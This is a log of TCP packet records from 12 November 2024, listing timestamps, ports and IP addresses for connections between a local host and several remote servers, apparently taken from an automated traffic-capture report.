Nov 12, 2024 00:06:09.925601006 CET	443	49707	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:09.925632954 CET	443	49707	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:09.925652027 CET	49707	443	192.168.2.5	142.250.185.196
Nov 12, 2024 00:06:09.925658941 CET	443	49707	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:09.925699949 CET	49707	443	192.168.2.5	142.250.185.196
Nov 12, 2024 00:06:09.926428080 CET	443	49707	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:09.926484108 CET	443	49707	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:09.926584959 CET	49707	443	192.168.2.5	142.250.185.196
Nov 12, 2024 00:06:09.926592112 CET	443	49707	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:09.927684069 CET	443	49707	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:09.927736044 CET	49707	443	192.168.2.5	142.250.185.196
Nov 12, 2024 00:06:09.927742958 CET	443	49707	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:09.931509972 CET	443	49707	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:09.931581974 CET	49707	443	192.168.2.5	142.250.185.196
Nov 12, 2024 00:06:09.931588888 CET	443	49707	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:09.935538054 CET	443	49707	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:09.935575962 CET	443	49707	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:09.935591936 CET	49707	443	192.168.2.5	142.250.185.196
Nov 12, 2024 00:06:09.935599089 CET	443	49707	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:09.935633898 CET	49707	443	192.168.2.5	142.250.185.196
Nov 12, 2024 00:06:09.939678907 CET	443	49707	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:09.943613052 CET	443	49707	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:09.943674088 CET	443	49707	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:09.943736076 CET	49707	443	192.168.2.5	142.250.185.196
Nov 12, 2024 00:06:09.943744898 CET	443	49707	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:09.943794012 CET	49707	443	192.168.2.5	142.250.185.196
Nov 12, 2024 00:06:09.947717905 CET	443	49707	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:09.947784901 CET	443	49707	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:09.947880983 CET	49707	443	192.168.2.5	142.250.185.196
Nov 12, 2024 00:06:09.947889090 CET	443	49707	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:09.951874018 CET	443	49707	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:09.951925039 CET	49707	443	192.168.2.5	142.250.185.196
Nov 12, 2024 00:06:09.951932907 CET	443	49707	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:09.956424952 CET	443	49707	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:09.956479073 CET	49707	443	192.168.2.5	142.250.185.196
Nov 12, 2024 00:06:09.956491947 CET	443	49707	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:09.959932089 CET	443	49707	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:09.959971905 CET	49707	443	192.168.2.5	142.250.185.196
Nov 12, 2024 00:06:09.959984064 CET	443	49707	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:09.963974953 CET	443	49707	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:09.964020014 CET	49707	443	192.168.2.5	142.250.185.196
Nov 12, 2024 00:06:09.964030981 CET	443	49707	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:09.968076944 CET	443	49707	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:09.968126059 CET	49707	443	192.168.2.5	142.250.185.196
Nov 12, 2024 00:06:09.968136072 CET	443	49707	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:09.972147942 CET	443	49707	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:09.972192049 CET	49707	443	192.168.2.5	142.250.185.196
Nov 12, 2024 00:06:09.972202063 CET	443	49707	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:09.977583885 CET	443	49707	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:09.977638960 CET	49707	443	192.168.2.5	142.250.185.196
Nov 12, 2024 00:06:09.977648973 CET	443	49707	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:09.980271101 CET	443	49707	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:09.980320930 CET	49707	443	192.168.2.5	142.250.185.196
Nov 12, 2024 00:06:09.980329990 CET	443	49707	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:10.006902933 CET	443	49707	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:10.006941080 CET	443	49707	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:10.006953001 CET	49707	443	192.168.2.5	142.250.185.196
Nov 12, 2024 00:06:10.006967068 CET	443	49707	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:10.007005930 CET	49707	443	192.168.2.5	142.250.185.196
Nov 12, 2024 00:06:10.007009029 CET	443	49707	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:10.007023096 CET	443	49707	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:10.007069111 CET	49707	443	192.168.2.5	142.250.185.196
Nov 12, 2024 00:06:10.007076025 CET	443	49707	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:10.007143974 CET	443	49707	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:10.007184029 CET	49707	443	192.168.2.5	142.250.185.196
Nov 12, 2024 00:06:10.007186890 CET	443	49707	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:10.007199049 CET	443	49707	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:10.007236958 CET	49707	443	192.168.2.5	142.250.185.196
Nov 12, 2024 00:06:10.007667065 CET	443	49707	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:10.007725954 CET	443	49707	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:10.007766962 CET	49707	443	192.168.2.5	142.250.185.196
Nov 12, 2024 00:06:10.007774115 CET	443	49707	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:10.008105040 CET	443	49707	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:10.008164883 CET	49707	443	192.168.2.5	142.250.185.196
Nov 12, 2024 00:06:10.008172989 CET	443	49707	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:10.011015892 CET	443	49707	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:10.011068106 CET	49707	443	192.168.2.5	142.250.185.196
Nov 12, 2024 00:06:10.011079073 CET	443	49707	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:10.013164997 CET	443	49707	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:10.013245106 CET	49707	443	192.168.2.5	142.250.185.196
Nov 12, 2024 00:06:10.013252020 CET	443	49707	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:10.015387058 CET	443	49707	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:10.015453100 CET	49707	443	192.168.2.5	142.250.185.196
Nov 12, 2024 00:06:10.015460968 CET	443	49707	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:10.017571926 CET	443	49707	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:10.017749071 CET	49707	443	192.168.2.5	142.250.185.196
Nov 12, 2024 00:06:10.017755985 CET	443	49707	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:10.019695997 CET	443	49707	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:10.019877911 CET	49707	443	192.168.2.5	142.250.185.196
Nov 12, 2024 00:06:10.019885063 CET	443	49707	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:10.020884991 CET	443	49703	23.1.237.91	192.168.2.5
Nov 12, 2024 00:06:10.020992994 CET	49703	443	192.168.2.5	23.1.237.91
Nov 12, 2024 00:06:10.021927118 CET	443	49707	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:10.021982908 CET	49707	443	192.168.2.5	142.250.185.196
Nov 12, 2024 00:06:10.021991014 CET	443	49707	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:10.024038076 CET	443	49707	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:10.024084091 CET	49707	443	192.168.2.5	142.250.185.196
Nov 12, 2024 00:06:10.024091959 CET	443	49707	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:10.026283979 CET	443	49707	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:10.026345968 CET	49707	443	192.168.2.5	142.250.185.196
Nov 12, 2024 00:06:10.026352882 CET	443	49707	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:10.068443060 CET	49707	443	192.168.2.5	142.250.185.196
Nov 12, 2024 00:06:10.068456888 CET	443	49707	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:10.069214106 CET	49707	443	192.168.2.5	142.250.185.196
Nov 12, 2024 00:06:10.069304943 CET	443	49707	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:10.069360971 CET	49707	443	192.168.2.5	142.250.185.196
Nov 12, 2024 00:06:11.426611900 CET	49719	443	192.168.2.5	216.58.206.46
Nov 12, 2024 00:06:11.426628113 CET	443	49719	216.58.206.46	192.168.2.5
Nov 12, 2024 00:06:11.426697969 CET	49719	443	192.168.2.5	216.58.206.46
Nov 12, 2024 00:06:11.426887989 CET	49719	443	192.168.2.5	216.58.206.46
Nov 12, 2024 00:06:11.426903009 CET	443	49719	216.58.206.46	192.168.2.5
Nov 12, 2024 00:06:11.732460022 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:11.732542038 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:12.020087957 CET	443	49719	216.58.206.46	192.168.2.5
Nov 12, 2024 00:06:12.020292997 CET	49719	443	192.168.2.5	216.58.206.46
Nov 12, 2024 00:06:12.020315886 CET	443	49719	216.58.206.46	192.168.2.5
Nov 12, 2024 00:06:12.021348000 CET	443	49719	216.58.206.46	192.168.2.5
Nov 12, 2024 00:06:12.021411896 CET	49719	443	192.168.2.5	216.58.206.46
Nov 12, 2024 00:06:12.022330999 CET	49719	443	192.168.2.5	216.58.206.46
Nov 12, 2024 00:06:12.022393942 CET	443	49719	216.58.206.46	192.168.2.5
Nov 12, 2024 00:06:12.022535086 CET	49719	443	192.168.2.5	216.58.206.46
Nov 12, 2024 00:06:12.022543907 CET	443	49719	216.58.206.46	192.168.2.5
Nov 12, 2024 00:06:12.068617105 CET	49719	443	192.168.2.5	216.58.206.46
Nov 12, 2024 00:06:12.191881895 CET	443	49719	216.58.206.46	192.168.2.5
Nov 12, 2024 00:06:12.191957951 CET	443	49719	216.58.206.46	192.168.2.5
Nov 12, 2024 00:06:12.191994905 CET	443	49719	216.58.206.46	192.168.2.5
Nov 12, 2024 00:06:12.192028046 CET	443	49719	216.58.206.46	192.168.2.5
Nov 12, 2024 00:06:12.192040920 CET	49719	443	192.168.2.5	216.58.206.46
Nov 12, 2024 00:06:12.192054033 CET	443	49719	216.58.206.46	192.168.2.5
Nov 12, 2024 00:06:12.192081928 CET	49719	443	192.168.2.5	216.58.206.46
Nov 12, 2024 00:06:12.192082882 CET	443	49719	216.58.206.46	192.168.2.5
Nov 12, 2024 00:06:12.192117929 CET	49719	443	192.168.2.5	216.58.206.46
Nov 12, 2024 00:06:12.192125082 CET	443	49719	216.58.206.46	192.168.2.5
Nov 12, 2024 00:06:12.197269917 CET	443	49719	216.58.206.46	192.168.2.5
Nov 12, 2024 00:06:12.198997021 CET	49719	443	192.168.2.5	216.58.206.46
Nov 12, 2024 00:06:12.199004889 CET	443	49719	216.58.206.46	192.168.2.5
Nov 12, 2024 00:06:12.239940882 CET	49719	443	192.168.2.5	216.58.206.46
Nov 12, 2024 00:06:12.239947081 CET	443	49719	216.58.206.46	192.168.2.5
Nov 12, 2024 00:06:12.272840977 CET	443	49719	216.58.206.46	192.168.2.5
Nov 12, 2024 00:06:12.272888899 CET	443	49719	216.58.206.46	192.168.2.5
Nov 12, 2024 00:06:12.272917986 CET	443	49719	216.58.206.46	192.168.2.5
Nov 12, 2024 00:06:12.272963047 CET	49719	443	192.168.2.5	216.58.206.46
Nov 12, 2024 00:06:12.272973061 CET	443	49719	216.58.206.46	192.168.2.5
Nov 12, 2024 00:06:12.272993088 CET	49719	443	192.168.2.5	216.58.206.46
Nov 12, 2024 00:06:12.275269032 CET	443	49719	216.58.206.46	192.168.2.5
Nov 12, 2024 00:06:12.275300980 CET	443	49719	216.58.206.46	192.168.2.5
Nov 12, 2024 00:06:12.275355101 CET	49719	443	192.168.2.5	216.58.206.46
Nov 12, 2024 00:06:12.275362968 CET	443	49719	216.58.206.46	192.168.2.5
Nov 12, 2024 00:06:12.275405884 CET	49719	443	192.168.2.5	216.58.206.46
Nov 12, 2024 00:06:12.283858061 CET	443	49719	216.58.206.46	192.168.2.5
Nov 12, 2024 00:06:12.288074017 CET	443	49719	216.58.206.46	192.168.2.5
Nov 12, 2024 00:06:12.288103104 CET	443	49719	216.58.206.46	192.168.2.5
Nov 12, 2024 00:06:12.288155079 CET	49719	443	192.168.2.5	216.58.206.46
Nov 12, 2024 00:06:12.288162947 CET	443	49719	216.58.206.46	192.168.2.5
Nov 12, 2024 00:06:12.288204908 CET	49719	443	192.168.2.5	216.58.206.46
Nov 12, 2024 00:06:12.292824030 CET	443	49719	216.58.206.46	192.168.2.5
Nov 12, 2024 00:06:12.298878908 CET	443	49719	216.58.206.46	192.168.2.5
Nov 12, 2024 00:06:12.298907995 CET	443	49719	216.58.206.46	192.168.2.5
Nov 12, 2024 00:06:12.298958063 CET	49719	443	192.168.2.5	216.58.206.46
Nov 12, 2024 00:06:12.298964977 CET	443	49719	216.58.206.46	192.168.2.5
Nov 12, 2024 00:06:12.299005985 CET	49719	443	192.168.2.5	216.58.206.46
Nov 12, 2024 00:06:12.304389954 CET	49722	443	192.168.2.5	142.250.185.196
Nov 12, 2024 00:06:12.304420948 CET	443	49722	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:12.304497957 CET	49722	443	192.168.2.5	142.250.185.196
Nov 12, 2024 00:06:12.304634094 CET	443	49719	216.58.206.46	192.168.2.5
Nov 12, 2024 00:06:12.304752111 CET	49722	443	192.168.2.5	142.250.185.196
Nov 12, 2024 00:06:12.304765940 CET	443	49722	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:12.310134888 CET	443	49719	216.58.206.46	192.168.2.5
Nov 12, 2024 00:06:12.315978050 CET	49719	443	192.168.2.5	216.58.206.46
Nov 12, 2024 00:06:12.315985918 CET	443	49719	216.58.206.46	192.168.2.5
Nov 12, 2024 00:06:12.324784040 CET	443	49719	216.58.206.46	192.168.2.5
Nov 12, 2024 00:06:12.328011990 CET	49719	443	192.168.2.5	216.58.206.46
Nov 12, 2024 00:06:12.328021049 CET	443	49719	216.58.206.46	192.168.2.5
Nov 12, 2024 00:06:12.354079962 CET	443	49719	216.58.206.46	192.168.2.5
Nov 12, 2024 00:06:12.354115963 CET	443	49719	216.58.206.46	192.168.2.5
Nov 12, 2024 00:06:12.354154110 CET	49719	443	192.168.2.5	216.58.206.46
Nov 12, 2024 00:06:12.354161978 CET	443	49719	216.58.206.46	192.168.2.5
Nov 12, 2024 00:06:12.354207039 CET	49719	443	192.168.2.5	216.58.206.46
Nov 12, 2024 00:06:12.354213953 CET	443	49719	216.58.206.46	192.168.2.5
Nov 12, 2024 00:06:12.354285002 CET	443	49719	216.58.206.46	192.168.2.5
Nov 12, 2024 00:06:12.354314089 CET	443	49719	216.58.206.46	192.168.2.5
Nov 12, 2024 00:06:12.354326963 CET	49719	443	192.168.2.5	216.58.206.46
Nov 12, 2024 00:06:12.354338884 CET	443	49719	216.58.206.46	192.168.2.5
Nov 12, 2024 00:06:12.354388952 CET	49719	443	192.168.2.5	216.58.206.46
Nov 12, 2024 00:06:12.354394913 CET	443	49719	216.58.206.46	192.168.2.5
Nov 12, 2024 00:06:12.355043888 CET	443	49719	216.58.206.46	192.168.2.5
Nov 12, 2024 00:06:12.356482029 CET	443	49719	216.58.206.46	192.168.2.5
Nov 12, 2024 00:06:12.356532097 CET	49719	443	192.168.2.5	216.58.206.46
Nov 12, 2024 00:06:12.356540918 CET	443	49719	216.58.206.46	192.168.2.5
Nov 12, 2024 00:06:12.356584072 CET	443	49719	216.58.206.46	192.168.2.5
Nov 12, 2024 00:06:12.356585026 CET	49719	443	192.168.2.5	216.58.206.46
Nov 12, 2024 00:06:12.356595039 CET	443	49719	216.58.206.46	192.168.2.5
Nov 12, 2024 00:06:12.356642962 CET	49719	443	192.168.2.5	216.58.206.46
Nov 12, 2024 00:06:12.359827995 CET	443	49719	216.58.206.46	192.168.2.5
Nov 12, 2024 00:06:12.363965988 CET	443	49719	216.58.206.46	192.168.2.5
Nov 12, 2024 00:06:12.364006042 CET	443	49719	216.58.206.46	192.168.2.5
Nov 12, 2024 00:06:12.364062071 CET	49719	443	192.168.2.5	216.58.206.46
Nov 12, 2024 00:06:12.364070892 CET	443	49719	216.58.206.46	192.168.2.5
Nov 12, 2024 00:06:12.364110947 CET	49719	443	192.168.2.5	216.58.206.46
Nov 12, 2024 00:06:12.367945910 CET	443	49719	216.58.206.46	192.168.2.5
Nov 12, 2024 00:06:12.372179031 CET	443	49719	216.58.206.46	192.168.2.5
Nov 12, 2024 00:06:12.372262001 CET	443	49719	216.58.206.46	192.168.2.5
Nov 12, 2024 00:06:12.372308016 CET	49719	443	192.168.2.5	216.58.206.46
Nov 12, 2024 00:06:12.372317076 CET	443	49719	216.58.206.46	192.168.2.5
Nov 12, 2024 00:06:12.372353077 CET	49719	443	192.168.2.5	216.58.206.46
Nov 12, 2024 00:06:12.377085924 CET	443	49719	216.58.206.46	192.168.2.5
Nov 12, 2024 00:06:12.380114079 CET	443	49719	216.58.206.46	192.168.2.5
Nov 12, 2024 00:06:12.380143881 CET	443	49719	216.58.206.46	192.168.2.5
Nov 12, 2024 00:06:12.380198002 CET	49719	443	192.168.2.5	216.58.206.46
Nov 12, 2024 00:06:12.380206108 CET	443	49719	216.58.206.46	192.168.2.5
Nov 12, 2024 00:06:12.380247116 CET	49719	443	192.168.2.5	216.58.206.46
Nov 12, 2024 00:06:12.384402990 CET	443	49719	216.58.206.46	192.168.2.5
Nov 12, 2024 00:06:12.388956070 CET	443	49719	216.58.206.46	192.168.2.5
Nov 12, 2024 00:06:12.388984919 CET	443	49719	216.58.206.46	192.168.2.5
Nov 12, 2024 00:06:12.389035940 CET	49719	443	192.168.2.5	216.58.206.46
Nov 12, 2024 00:06:12.389045000 CET	443	49719	216.58.206.46	192.168.2.5
Nov 12, 2024 00:06:12.389086008 CET	49719	443	192.168.2.5	216.58.206.46
Nov 12, 2024 00:06:12.392256021 CET	443	49719	216.58.206.46	192.168.2.5
Nov 12, 2024 00:06:12.396681070 CET	443	49719	216.58.206.46	192.168.2.5
Nov 12, 2024 00:06:12.396718979 CET	443	49719	216.58.206.46	192.168.2.5
Nov 12, 2024 00:06:12.396768093 CET	49719	443	192.168.2.5	216.58.206.46
Nov 12, 2024 00:06:12.396775961 CET	443	49719	216.58.206.46	192.168.2.5
Nov 12, 2024 00:06:12.396830082 CET	49719	443	192.168.2.5	216.58.206.46
Nov 12, 2024 00:06:12.400523901 CET	443	49719	216.58.206.46	192.168.2.5
Nov 12, 2024 00:06:12.404711008 CET	443	49719	216.58.206.46	192.168.2.5
Nov 12, 2024 00:06:12.405699968 CET	443	49719	216.58.206.46	192.168.2.5
Nov 12, 2024 00:06:12.405755043 CET	49719	443	192.168.2.5	216.58.206.46
Nov 12, 2024 00:06:12.405761957 CET	443	49719	216.58.206.46	192.168.2.5
Nov 12, 2024 00:06:12.405805111 CET	49719	443	192.168.2.5	216.58.206.46
Nov 12, 2024 00:06:12.407356024 CET	49723	443	192.168.2.5	142.250.186.110
Nov 12, 2024 00:06:12.407370090 CET	443	49723	142.250.186.110	192.168.2.5
Nov 12, 2024 00:06:12.407438040 CET	49723	443	192.168.2.5	142.250.186.110
Nov 12, 2024 00:06:12.407645941 CET	49723	443	192.168.2.5	142.250.186.110
Nov 12, 2024 00:06:12.407658100 CET	443	49723	142.250.186.110	192.168.2.5
Nov 12, 2024 00:06:12.408804893 CET	443	49719	216.58.206.46	192.168.2.5
Nov 12, 2024 00:06:12.412589073 CET	443	49719	216.58.206.46	192.168.2.5
Nov 12, 2024 00:06:12.414993048 CET	49719	443	192.168.2.5	216.58.206.46
Nov 12, 2024 00:06:12.415000916 CET	443	49719	216.58.206.46	192.168.2.5
Nov 12, 2024 00:06:12.435141087 CET	443	49719	216.58.206.46	192.168.2.5
Nov 12, 2024 00:06:12.435168028 CET	443	49719	216.58.206.46	192.168.2.5
Nov 12, 2024 00:06:12.435234070 CET	49719	443	192.168.2.5	216.58.206.46
Nov 12, 2024 00:06:12.435240984 CET	443	49719	216.58.206.46	192.168.2.5
Nov 12, 2024 00:06:12.435280085 CET	443	49719	216.58.206.46	192.168.2.5
Nov 12, 2024 00:06:12.435286045 CET	49719	443	192.168.2.5	216.58.206.46
Nov 12, 2024 00:06:12.435292006 CET	443	49719	216.58.206.46	192.168.2.5
Nov 12, 2024 00:06:12.435342073 CET	49719	443	192.168.2.5	216.58.206.46
Nov 12, 2024 00:06:12.435420990 CET	443	49719	216.58.206.46	192.168.2.5
Nov 12, 2024 00:06:12.435821056 CET	443	49719	216.58.206.46	192.168.2.5
Nov 12, 2024 00:06:12.435854912 CET	443	49719	216.58.206.46	192.168.2.5
Nov 12, 2024 00:06:12.435900927 CET	49719	443	192.168.2.5	216.58.206.46
Nov 12, 2024 00:06:12.435909033 CET	443	49719	216.58.206.46	192.168.2.5
Nov 12, 2024 00:06:12.435954094 CET	49719	443	192.168.2.5	216.58.206.46
Nov 12, 2024 00:06:12.436161995 CET	443	49719	216.58.206.46	192.168.2.5
Nov 12, 2024 00:06:12.436252117 CET	443	49719	216.58.206.46	192.168.2.5
Nov 12, 2024 00:06:12.436280012 CET	443	49719	216.58.206.46	192.168.2.5
Nov 12, 2024 00:06:12.436331987 CET	49719	443	192.168.2.5	216.58.206.46
Nov 12, 2024 00:06:12.436341047 CET	443	49719	216.58.206.46	192.168.2.5
Nov 12, 2024 00:06:12.436384916 CET	49719	443	192.168.2.5	216.58.206.46
Nov 12, 2024 00:06:12.439130068 CET	443	49719	216.58.206.46	192.168.2.5
Nov 12, 2024 00:06:12.441154003 CET	443	49719	216.58.206.46	192.168.2.5
Nov 12, 2024 00:06:12.441190004 CET	443	49719	216.58.206.46	192.168.2.5
Nov 12, 2024 00:06:12.441207886 CET	49719	443	192.168.2.5	216.58.206.46
Nov 12, 2024 00:06:12.441215992 CET	443	49719	216.58.206.46	192.168.2.5
Nov 12, 2024 00:06:12.441999912 CET	49719	443	192.168.2.5	216.58.206.46
Nov 12, 2024 00:06:12.443500042 CET	443	49719	216.58.206.46	192.168.2.5
Nov 12, 2024 00:06:12.490088940 CET	49719	443	192.168.2.5	216.58.206.46
Nov 12, 2024 00:06:12.490098000 CET	443	49719	216.58.206.46	192.168.2.5
Nov 12, 2024 00:06:12.490633011 CET	49719	443	192.168.2.5	216.58.206.46
Nov 12, 2024 00:06:12.490695953 CET	443	49719	216.58.206.46	192.168.2.5
Nov 12, 2024 00:06:12.490760088 CET	49719	443	192.168.2.5	216.58.206.46
Nov 12, 2024 00:06:12.896162987 CET	443	49722	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:12.896756887 CET	49722	443	192.168.2.5	142.250.185.196
Nov 12, 2024 00:06:12.896779060 CET	443	49722	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:12.897793055 CET	443	49722	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:12.897950888 CET	49722	443	192.168.2.5	142.250.185.196
Nov 12, 2024 00:06:12.898165941 CET	49722	443	192.168.2.5	142.250.185.196
Nov 12, 2024 00:06:12.898225069 CET	443	49722	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:12.944164991 CET	49722	443	192.168.2.5	142.250.185.196
Nov 12, 2024 00:06:12.944175959 CET	443	49722	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:12.991033077 CET	49722	443	192.168.2.5	142.250.185.196
Nov 12, 2024 00:06:12.995938063 CET	443	49723	142.250.186.110	192.168.2.5
Nov 12, 2024 00:06:12.996156931 CET	49723	443	192.168.2.5	142.250.186.110
Nov 12, 2024 00:06:12.996176958 CET	443	49723	142.250.186.110	192.168.2.5
Nov 12, 2024 00:06:12.996556044 CET	443	49723	142.250.186.110	192.168.2.5
Nov 12, 2024 00:06:12.996615887 CET	49723	443	192.168.2.5	142.250.186.110
Nov 12, 2024 00:06:12.997262955 CET	443	49723	142.250.186.110	192.168.2.5
Nov 12, 2024 00:06:12.997313023 CET	49723	443	192.168.2.5	142.250.186.110
Nov 12, 2024 00:06:12.998229980 CET	49723	443	192.168.2.5	142.250.186.110
Nov 12, 2024 00:06:12.998301983 CET	443	49723	142.250.186.110	192.168.2.5
Nov 12, 2024 00:06:12.998426914 CET	49723	443	192.168.2.5	142.250.186.110
Nov 12, 2024 00:06:12.998436928 CET	443	49723	142.250.186.110	192.168.2.5
Nov 12, 2024 00:06:12.998450994 CET	49723	443	192.168.2.5	142.250.186.110
Nov 12, 2024 00:06:13.039325953 CET	443	49723	142.250.186.110	192.168.2.5
Nov 12, 2024 00:06:13.053436995 CET	49723	443	192.168.2.5	142.250.186.110
Nov 12, 2024 00:06:13.199037075 CET	443	49723	142.250.186.110	192.168.2.5
Nov 12, 2024 00:06:13.241040945 CET	49723	443	192.168.2.5	142.250.186.110
Nov 12, 2024 00:06:13.241050959 CET	443	49723	142.250.186.110	192.168.2.5
Nov 12, 2024 00:06:13.242238045 CET	49723	443	192.168.2.5	142.250.186.110
Nov 12, 2024 00:06:13.242283106 CET	443	49723	142.250.186.110	192.168.2.5
Nov 12, 2024 00:06:13.242336035 CET	49723	443	192.168.2.5	142.250.186.110
Nov 12, 2024 00:06:13.337452888 CET	49724	443	192.168.2.5	184.28.90.27
Nov 12, 2024 00:06:13.337498903 CET	443	49724	184.28.90.27	192.168.2.5
Nov 12, 2024 00:06:13.337579012 CET	49724	443	192.168.2.5	184.28.90.27
Nov 12, 2024 00:06:13.339221001 CET	49724	443	192.168.2.5	184.28.90.27
Nov 12, 2024 00:06:13.339232922 CET	443	49724	184.28.90.27	192.168.2.5
Nov 12, 2024 00:06:13.843888044 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:13.844150066 CET	49728	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:13.848786116 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:13.848999023 CET	80	49728	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:13.849072933 CET	49728	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:13.849174976 CET	49728	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:13.849184990 CET	49728	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:13.854089022 CET	80	49728	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:13.854110956 CET	80	49728	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:13.931099892 CET	443	49724	184.28.90.27	192.168.2.5
Nov 12, 2024 00:06:13.931160927 CET	49724	443	192.168.2.5	184.28.90.27
Nov 12, 2024 00:06:13.935342073 CET	49724	443	192.168.2.5	184.28.90.27
Nov 12, 2024 00:06:13.935355902 CET	443	49724	184.28.90.27	192.168.2.5
Nov 12, 2024 00:06:13.935570955 CET	443	49724	184.28.90.27	192.168.2.5
Nov 12, 2024 00:06:13.975677967 CET	49724	443	192.168.2.5	184.28.90.27
Nov 12, 2024 00:06:13.979933977 CET	49724	443	192.168.2.5	184.28.90.27
Nov 12, 2024 00:06:14.027343035 CET	443	49724	184.28.90.27	192.168.2.5
Nov 12, 2024 00:06:14.147010088 CET	443	49724	184.28.90.27	192.168.2.5
Nov 12, 2024 00:06:14.147075891 CET	443	49724	184.28.90.27	192.168.2.5
Nov 12, 2024 00:06:14.147119999 CET	49724	443	192.168.2.5	184.28.90.27
Nov 12, 2024 00:06:14.147288084 CET	49724	443	192.168.2.5	184.28.90.27
Nov 12, 2024 00:06:14.147305012 CET	443	49724	184.28.90.27	192.168.2.5
Nov 12, 2024 00:06:14.147320032 CET	49724	443	192.168.2.5	184.28.90.27
Nov 12, 2024 00:06:14.147326946 CET	443	49724	184.28.90.27	192.168.2.5
Nov 12, 2024 00:06:14.182957888 CET	49730	443	192.168.2.5	184.28.90.27
Nov 12, 2024 00:06:14.182987928 CET	443	49730	184.28.90.27	192.168.2.5
Nov 12, 2024 00:06:14.183136940 CET	49730	443	192.168.2.5	184.28.90.27
Nov 12, 2024 00:06:14.183424950 CET	49730	443	192.168.2.5	184.28.90.27
Nov 12, 2024 00:06:14.183438063 CET	443	49730	184.28.90.27	192.168.2.5
Nov 12, 2024 00:06:14.258902073 CET	49731	443	192.168.2.5	142.250.186.110
Nov 12, 2024 00:06:14.258930922 CET	443	49731	142.250.186.110	192.168.2.5
Nov 12, 2024 00:06:14.259000063 CET	49731	443	192.168.2.5	142.250.186.110
Nov 12, 2024 00:06:14.260056019 CET	49731	443	192.168.2.5	142.250.186.110
Nov 12, 2024 00:06:14.260070086 CET	443	49731	142.250.186.110	192.168.2.5
Nov 12, 2024 00:06:14.763134003 CET	443	49730	184.28.90.27	192.168.2.5
